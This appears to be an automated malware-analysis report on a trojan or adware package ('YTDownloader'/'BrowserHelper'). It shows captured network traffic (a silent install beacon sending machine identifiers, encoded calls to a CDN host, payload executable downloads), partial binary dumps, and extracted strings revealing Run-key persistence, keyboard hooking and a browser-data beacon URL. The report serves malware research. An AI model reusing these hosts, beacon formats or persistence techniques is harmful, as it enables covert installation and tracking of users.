GET /apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402674&lifetime=0&silent=1&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 HTTP/1.1

Host: stats.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: ORs1KK BLI0jbKxkyJ9sBnq98L7wYzbSmVwDYlftOnFFtsHvPa2EdEQzChgvNHk3zLnK0fVm40o=

x-amz-request-id: 68702ACB6A0591B2

Date: Sat, 01 Aug 2015 04:18:01 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 14:05:13 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ORs1KK
 BLI0jbKxkyJ9sBnq98L7wYzbSmVwDYlftOnFFtsHvPa2EdEQzChgvNHk3zLnK0fVm40o=
..x-amz-request-id: 68702ACB6A0591B2..Date: Sat, 01 Aug 2015 04:18:01 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Tue, 23 Jun 2015 14:05:13 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qxWOvghCBTr/XvKbjUyzCCcFAL52sIXt4V mdZi2lOgm uz5FUTyZHqZLRunpF04Gnp31AH4wbxjJRF10/JyN4cjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /27944.ashx?e=LCnUzM5l8JJsK0lFUFVJ7zyMpz1Liwuq0mXIKGF6Fg9XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySxfX6JWT60I15ewo25xH dugxP4Tpn7X9BPEhRyyBD7ADYwDanr6NLtqQCm9ETKWdXr6MSN5TWO9FMoEMJ/sprmNd3ZXUTzY 8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

GET /spdbt/shoppy/snsch7.exe_d HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438276444"

Last-Modified: Thu, 30 Jul 2015 17:14:04 GMT

Cache-Control: max-age=1462

Content-Length: 2088396

Content-Type: text/plain

X-HW: 1438402659.dop011.fr7.t,1438402659.cds012.fr7.sr,1438402658.dop006.dc1.r,1438402659.cds025.dc1.c,1438402659.cds012.fr7.pr
.1{.G.?.... ..H...c.....r..F..M\..x..k...{.*..hg,LJT...7..ps.|~yj..hJU
...,.x...._T........JM.H........bO.......l.....e.Po.o0*.l...m.g...k...
...PEI........o.........G.."6..J...Ek&..t...e..._...#y.1.....C@."..w..
...y...`...\.>O.c3!..>......%.v.x.,8..P.i.#.!.../....pk.....47G.
,.U7....F.l...`...W..U..1.Q.G..S..n..U..(O<F.....q:.5..4h\...._u?&c
...)&y.E,...F...f....Lv.'Ts.b.F.8...g~....3..Ryi...{....,..4/..l.yP...
._u1.0.....i...}...5mr/..&D.lE.f.....y].~.......F`<....9`E.].., ...
-.Uyh.?.0.....:"..~...l1|c.f.B...g[...............6<.....L>L.c{W
.9e.{....N. @o..p......!%.v..>..._..P..*.^..4..-U(......tQ.T.$Z.?.^
}Z.x&......&..M..MD]i*..F..~G;...&N...U1`..g.CC=..L.7.....p.,$..(wh:.t
.P....EZ.l6..............m..G..t...\0..K....o|8.O.@d..../q..?_.B...Z.=
...D...}...>Qn....0dza..^.D.C!.........(.g...5<. ..t....Dw...N..
.....a......ma.o(^. ....p.L.....,T..}.E..D....=. /.R.d...M...=e.R1.|Z\
W..h....m...:...0..5.....\.F..M...5p..iat86.....=.D...`Zx.6...f]@M..I.
Z..^].Y..0...&.&..E....D.~..".......n..'..Z.\.......cDG..w............
a....m.6.4..S..6..6[.........,.w..[q.*......EuN.....z...j.......B.:z;?
`.9VZ..9.t.:3../<..He..e.2...........ml....bO...}P..6..v"[%.?k...j.
7J....,`[email protected]..:...!..g...k...c...x.g.K
V.}F..)..(?G...UP..}.k...G)..Y.N.....F.Nu..3...p...I0j>.......n..(.
.._.`!.U....X).>..2.v... .BJ..q.%6....AR9Kt.r.......sL>....7....
.)jG.)84e..(.&:..J..\....O,[email protected]..]mK...L.U.N..<.b..X.....E4....
...IQ...a!...[..7.Pq.k.PY..d......z........:......H......r.. !.><<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:00 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438313709"

Last-Modified: Fri, 31 Jul 2015 03:35:09 GMT

Cache-Control: max-age=710

Content-Length: 228352

Content-Range: bytes 0-228351/228352

Content-Type: application/x-msdownload

X-HW: 1438402620.dop002.fr7.t,1438402620.cds001.fr7.c

Content-Disposition: attachment; filename="setup.exe"

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1.S.u}=.u}=.
u}=.|...p}=.u}<.|}=.x/..t}=.x/..t}=.Richu}=........................
.PE..L...rt.T..................................... ....@..............
............0..............................................` ..<...
......................................................................
........... ..,............................text...[...................
........ ..`.rdata..n.... ......................@..@..................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U.........E........E
.....E..}.....}......k.....`......h......`...Pj.... @.j.h....j.j.j.h..
.@hR @.... @..E...., @..M..U.....U..N @..E.j.h....j.j.j.h......`...Q..
. @..E.j.j..U.R.E.P... @..E......E........M.....M..U.;U.}Mj..E.Pj..M.Q
.U.R... @..E.%....y.H...@.... @...U.3..U.j..E.Pj..M.Q.U.R... @....E.P.
.. @.j.j.... @.PhR @.j.j...$ @.j.... @.3...]..........................
......................................................................
..................................................................

<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8378

Content-Range: bytes 250000-499999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: W11PGESgriHPVXjxalfY5hKW4A47dQqA_MRvIuc40VVTaL5UaDag4Q==
b"..,#5v...#4%..!d.._H.....fc.(}...f"tp...o...;.h.X....R.........$.p..
).[.9....r.{..Q..@L).zQ...?Q...8.....N".i.=^..L>.. mf.V.....}0..s.]
..........d....X..........)&.k./.....$.......^..kP..bR./... .?@$3..|:a
.~...}..b.....t_..gU^Z.>(,`K........7.IVZ..L..f...........;.;...@A.
.r.7.>0.9D......=cZ..P.C.i.".......g%..hm....v.-u.$..........-..`&.
......t.dX.8....M.5..^.T...l...).....6c...;.....(t.en..'..<.:......
....*..JQ......m.-h(.._.......H}.....A..d&...;.M.. }...*NPk...uL......
..N...i..?..}...........t...l0.6.(.e...C.....$.Z._.7.=.z....._/l.L...d
...w.'........D.>..\.....G..#..9."...4VT.B;...P....G0D.h o..A9-.g.3
X&k....Jc.c|>1.3i..<..... ..T.iR.....$...P..W..f...i.......ZM.Z@
n..f8......ID.U|.......:.?G.oB....\.>.x|..~c.. .m.G7.........V...zu
>.p.n.....-..=.....8...G.>."..u..8..E...C:.......i|..>.H...B.
.Y.WA.......Z.a.J......%.)I.3!%..3g....<..~...hP...4.8...;O...k"...
....W>FV.....,f.......GOy..zE..C7....H.......7..Z....E..c.qC)..L.Y.
..e...t...XK.. .=..Ub5....... p 6.y...C.<.].7....T........v..X.G...
~Qe.s.twV!....?F.2.OK/..R_...{>....S.Jh.)...g....>.3 *.%Q0m...S.
...ua..a ...p..Y...~..E\..". ).C..7..e....\.P4 ..o.P.j,..Nm.....1./...
n1#Y$Y'...\.4..7a...&.%.,z......{...p.`.f-}.1...Mz.Y...@0.......".....
/.a"y 7B.S.\...g6u.E{.^^.....a.J..4.9 .....ZL.).n.(....1......!Z...k.:
Y.5?........7H.r...EC.....ah....._1....._..=..t..I.s8r5#.........'...&
e. (...Pc4.......h..,{F[J....JE..`Z... ..m...........[g...U.. .....X..
...%..eO).W...f.='...........a.[.v"$J..w....j=..:.5i.`....&.P.....<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8378

Content-Range: bytes 750000-999999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: YTDcXhvgAU_h-rTyA2IcT7xQH0txZVWpbraSwchOOalm1TOa_6IEhQ==
.j.....2.;W....~.....5...#SMs....E\..S^.Bbv..NLY&.C.*.E.1..;~.Z.i.WlCP
..u...k.d...I`..............i....-1..D...S.Kb.{].&.0....O.....V*..X'.`
.....B.?..........o].J..|D..d...-...3..!.~....oq =U>..!.Fad..0K...)
..............m.0.M.....w?...$..Z.t....#M,...!y..V..`...~_.....X......
7../k@..>C=...I`..R...V|Dr..5..Z..^".#;<x .-Hf-.~.A...>y..>
;.hV....g..<_..2..h..7..Ke.(u...$I...9.....?X..h....,.'DWJ...|.....
.....*8.q...o.o..i?...\AM#..=.........p4.k...`. ..`n.............:.6.o
.eWi.F.D.9..t....`.}Q..p..w.>=....g..C.7...s..;J.]....J....$.;...2.
t.G..5,.-=qY.D.CX..xw.2.Z^.9..[=..]..$Z./G...)=...-...Z........:...F..
..........`.......  dk.....$.....Gw..Vy{.#......p..#..8.b.7../....5.O.
.?.7.v8.q.s.>[email protected]'.H.*.DkC<g..u..S$.."....%....{g.{....
..H....!/..V.W.>...O]..ro...,.o.......>z..-..-._..v.........V...
.~.X.<._G.(..1..o..G......)......J....:.....F..(.E. .u.}.WE........
>#......./.J...5.=3.9l.t..$Z.|%...6<....U....Mb. 3(.Q....6......
l5......)d.7.5...I^...Q.{.....;..;.A...?.w...2....Pl^...?..K.....c6.E.
e...=...A5`......"a..`........5jH....l.PL.p:tJ...&.8W..!;.&....2 ...*&
...-t. Q.4..:H'.s(o;...L..v..S......P.....Ky..m..f.J>.w.}|....P...X
>..l.'.q.WB"..d......,...t]..19..........^uTq.e.F'........~......r.
..fLr ..8..5.AB\.....6~'..3... .._........z.z.2W._...9..Y........&Y.U.
...<..2...#.z.;..\q3T.."p..p. ;.._N....{%!S.....z(.......e..p...*..
..!.rD....4.....'.s..W....8..27)4....y.~IN...C..a.d.bK...u...p...B!...
3..n8xyBG'..g..A.%*..}...?;w7kBik"K.........S.........f.V.!....B.h<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 01:57:22 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8379

Content-Range: bytes 1250000-1499999/2707024

X-Cache: Hit from cloudfront

Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Gtiqzds9LZmjOtRB9p4p802qRlQ_vUcKFEvUZk2tlNHwHOLC_utERA==
[email protected]..."{......o|x...
s....e.14..2..V#r..9..X..P_.k.E.8..i..qF.sp..c...3OS..;zIv.;......<
.`.H.h....,..a.qQ/.l.@......#....}.A..8.aDQ.r....f3...q...;...H.......
..T..=.....s.c.{[email protected]..._8m.%....NW.7.
......%..65......)...!.,Y.jd.&.|0.......J.Gl. ....}......?...p..y^.pz*
......d.I......>._'......r....j.A6..K.r%....;.6R.....6..rS-.....A.B
...I..Z...Q7...G...A.L .z...bN.*...........|..>.N[.1W.>c...}.c..
.uiH)..Ro.q...u.|9.E.K.2hJ...;...X..M`..E<............coxE.YI.....G
.........c...]U..6....9.#..|.T[...6....kS .j.WF.....{...!i.".....I..D.
......x.C*."....h...x2q.......E.....BPW...n..c..R~..]....S..;W..#..Z.X
H...7.r.....^..'."..$.g....t..m..(].Uz.......9U.c.......Z...H.FA....[U
;.~.h...!...l..o..[.....n*.p...O.S.2...ahz.5CVxh..."..(...............
..;./#z.. ....F.......rEd.\.Y..o2..z.........c....M.....1[3..2........
.VqUH.k.ed.F.J..}.F..............N....E.z..U#=A.'..... ..rm...zx..V.`.
.T..gf.....-..g95.mr..d:y.P...K..I...&.%.;o..<[email protected]..|......W....
%..:..W.|[email protected].'.[..Fii%".;.V.|...ut.
.=...../z....U"Z^n..\.Y....Ri..=..8..^ ..... WA]..!...=.....(....%h..!
...:.[^m...%Q....`[email protected]...[.7.8........JH.d...lp.J..C..z..C*.m.5
...|G..`....]."...Y..l8.c.15.3J..6..x.U..*...W..'....'...5..`...A..ZrK
..C...<...bXconOw..!M.....\......C...5(;Z..}..Nmx.K.:.....H......).
Q-C.....z |...(.Fg.S?.'.s.W^..UgzE.....{...).'...NsYm/.P...b`.[.2.0...
.....T...#...O.I.%..?..&Q`@2/.y7k".GB..R..(t].......|.DcF.........<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Sat, 01 Aug 2015 04:17:02 GMT

Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT

ETag: "1af5b44d8d4f63f1a2db7e63dd4da19f"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 1750000-1999999/2707024

X-Cache: Miss from cloudfront

Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: QDcxTqfGoYLlyMFwwkH3MzJm9xJPdrU8XaxNxtSPPTF_rsg_EU4KMA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Date: Sat, 01 Aug 2015
 04:17:02 GMT..Last-Modified: Sat, 01 Aug 2015 01:20:36 GMT..ETag: "1a
f5b44d8d4f63f1a2db7e63dd4da19f"..Accept-Ranges: bytes..Server: AmazonS
3..Content-Range: bytes 1750000-1999999/2707024..X-Cache: Miss from cl
oudfront..Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (Cl
oudFront)..X-Amz-Cf-Id: QDcxTqfGoYLlyMFwwkH3MzJm9xJPdrU8XaxNxtSPPTF_rs
g_EU4KMA==.....[..&.(.*...|......}...w...I.Z...#A...uW...$.&..........
.`.J. ...9.. ;.....8.*!..H.e.0f....1.JNm..o........X@`.E....:A....@Y.@
......r,[email protected]"&.d...|xN.Q.V....,W.....q..... }5.u....&...Z
....y6.eL...O..0 pj.....~/./. z..4.2.r.j.h!....,.;.. .y.W.B/..........
{...3..,......=..........8t.1..M[..e}...!f(.........0.Q......6t.N..*f.
"...N..B..<.......!.7.G.&.......E.....b.....5..d..^.A.m.DGG..O7.P..
4...D..&a..n......S..[4U|w.....~......H.\d.o...0.Z...J..$z.yW.....~m..
.......t....5V".i#......^.X..{.a.l.0S.C.7...$....\Q0.. ....0.K.-m.../b
........N8....m..VvXH.f...L...m....z...b.D.Xl..h..].....p..>..@....
|.Bd..S.;D.t.S..[.QK...o.V...~5R$.......hM}Q...e4......\.F....<Y...
[email protected]|.........5..[fC....I.-~.......XWI.>W.$..x};.HD..~Q....
.{!......];."0..........Vs..x. .W.R....K......;W@S[...&....dUU.....Ah.
..il.?.s....-3.z.5o..R...n..:.7.07N.$..d5?.s.....U..E.0Jn....UKSv..'.F
.D....'. )]._.......r..~..2.j.6......,.X...'^.5K.<...1.p... ..s)Pu.
l.,QKK..1f....p)2...y...0.'.....{..L"...G.L..o.>...]Xb.$.n5{...<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

BROWSE~2.EXE_3668:

.text

`.rdata

@.data

.rsrc

@.reloc

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

Process token open Error: %u

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb

KERNEL32.dll

USER32.dll

ADVAPI32.dll

GetProcessHeap

GetCPInfo

zcÁ

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

4 5 52585>5

01S1|3

Amscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

BrowserHelper.exe

explorer.exe

Software\Microsoft\Windows\CurrentVersion\Run

e:%d s:%d

\BrowserHelper.exe

C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_3952:

.text

`.rdata

@.data

.rsrc

@.reloc

j.Yf;

_tcPVj@

.PjRW

Higher: %x

Lower: %x

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb

WinExec

KERNEL32.dll

SetWindowsHookExW

UnhookWindowsHookEx

USER32.dll

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegOpenKeyW

RegOpenKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

HttpOpenRequestW

HttpAddRequestHeadersW

HttpSendRequestW

HttpSendRequestExW

HttpEndRequestW

HttpQueryInfoW

WININET.dll

VERSION.dll

PSAPI.DLL

GetCPInfo

GetProcessHeap

zcÁ

.?AVCHttp@@

C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

2/2P3z3

"1*1/141

C1k1y1<3\3c3k3p3t3x3

2%2x2

= >->2>@>

6$6-626?6

;%; ;5;@;

4 4,40444

@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Windows 95

Windows 98

Windows Me

Windows NT

Windows 2000

Windows XP

Windows 2003 Server

Windows Vista

Windows 7

Windows CE

%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

ConfigDB.dll

config.xml

<d/d/%d d:d:d::d 0x%X>

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

kernel32.dll

WININET.DLL

user32.dll

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

PipeName

[CUtils::GetDAPPipeName] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

%d.%d.%d.%d

"%s" "%s"

d/d/%d d:d:d::d

"%s" %s

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

%d-d-d

0.0.0.0

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe

%Program Files%\Internet Explorer\IEXPLORE.EXE

http\shell\open\command

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk

Mozilla Firefox

Google Chrome

explorer.exe

&exe%d=%s&ver%d=%s&arr%d=%s

&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d

hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?

BrowserHelper.txt

BrowserHelperBk.txt

Chrome

Mozilla

iexplore.exe

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

%s?e=%s

zvl=%s&

1.7.0.0

Updater.exe

YTDownloader.exe_2380:

.text

`.rdata

@.data

.idata

.rsrc

@.reloc

SSShh

WSSh(

SPSSh

.tMHtJH

F><.tN<[tJ<\tF<*tB<|t><^t:<$t6

FTPQ

tL<%u@

9>t.hp

;NTu^SSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

1.3.6.1.4.1.311.2.1.12

1.2.840.113549.1.9.5

1.2.840.113549.1.9.6

CRtmpParser::GetFieldDataString

CRtmpParser::GetFieldDataNumber

NetStream.Play.Reset

NetStream.Unpause.Notify

NetStream.Pause.Notify

NetStream.Seek.Notify

NetStream.Play.Stop

NetStream.Play.Failed

NetStream.Failed

()$^.* ?[]|\-{},:=!

video/WebM

"url_encoded_fmt_stream_map": "(.*?)"

rtmpe%3Dyes

url_encoded_fmt_stream_map=

%s, string reference, index: %d, not supported, ignoring!

%s - AMF3 unknown/unsupported datatype 0xx, @%p

AMF3_DATE reference: %d, not supported!

Property: <%s%s>

timestamp: %.2f, UTC offset: %d

INVALID TYPE 0xx

Property: <%sSTRICT_ARRAY>

Property: <%sECMA_ARRAY>

Property: <%sOBJECT>

AMF_Encode - failed to encode property in index %d

%s, invalid type. %d

%s, failed to decode AMF3 property!

Member: %s

Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d

Class reference: %d

Object reference, index: %d

%s: Empty buffer/no buffer pointer!

%s - unknown datatype 0xx, @%p

AMF_TYPED_OBJECT not supported!

AMF_REFERENCE not supported!

%s: Name size out of range: namesize (%d) > len (%d) - 2

%s: Not enough data for decoding with name, less than 4 bytes!

HTTP/1

%s, Setting socket timeout to %ds failed!

%s, No SSL/TLS support

HTTP_get

If-Modified-Since: %s

GET %s HTTP/1.0

User-Agent: %s

Host: %s

Mozilla/5.0

%s, d %s %d d:d:d GMT

size: x

date: %s

ctim: %s

url: %.*s

%s: couldn't open %s for writing, errno %d (%s)

%s: couldn't contact swfurl %s (HTTP error %d)

%s: swfurl %s not found

%s: connection lost while downloading swfurl %s

1.1.4

%s%s\.swfinfo

%s: %s

hXXp://

[[IMPORT]]

No application or playpath in URL!

Invalid port number!

No hostname in URL!

Parsed protocol: %d

RTMP URL: No :// in url!

NetConnection.confStream

NetStream.Publish.Start

NetStream.Play.UnpublishNotify

NetStream.Play.PublishNotify

NetStream.Play.Complete

NetStream.Play.Start

NetConnection.Connect.InvalidApp

NetStream.Play.StreamNotFound

NetStream.Authenticate.UsherToken

Publisher password

pubPasswd

Key for SecureToken response

Justin.tv authentication token

URL to player SWF file

swfUrl

URL of played media's web page

pageUrl

URL to played stream

tcUrl

DH public key does not fulfill y^q mod p = 1

DH public key must be at most p-2

DH public key must be at least 2

RC4 In Key:

RC4 Out Key:

%s: Couldn't calculate correct DH offset (got %d), exiting!

%s: Couldn't calculate correct digest offset (got %d), exiting

%s: Couldn't calculate DH offset (got %d), exiting!

%s: Couldn't calculate digest offset (got %d), exiting!

RTMP PACKET: packet type: 0xx. channel: 0xx. info 1: %d info 2: %d. Body size: %u. body: 0xx

Connecting via SOCKS proxy: %s:%d

SWFSize : %u

live : %s

StopTime : %d msec

StartTime : %d msec

flashVer : %s

NetStream.Authenticate.UsherToken : %s

subscribepath : %s

auth : %s

pageUrl : %s

swfUrl : %s

tcUrl : %s

Playpath : %s

Port : %d

Protocol : %s

s %-7s %s

Unknown option %s

%s://%.*s:%d/%.*s

Problem accessing the DNS. (addr: %s)

%s, error

%s, Authentication failed: unknown auth mode: %s

%s, Authentication failed

%s, new app: %.*s tcUrl: %.*s playpath: %s

&nonce=%s&cnonce=%s&nc=%s&response=%s

%s, md5(%s:%s:%s:%s:%s:%s) =>

%s, md5(%s:/%.*s) =>

%s, md5(%s:%s:%s) =>

%s, pubToken1: %s

?%s&user=%s

%s, Authentication failed: no such user

%s, Authentication failed: wrong password

%s, pubToken2: %s

&challenge=%s&response=%s&opaque=%s

%s, b64(md5_2) = %s

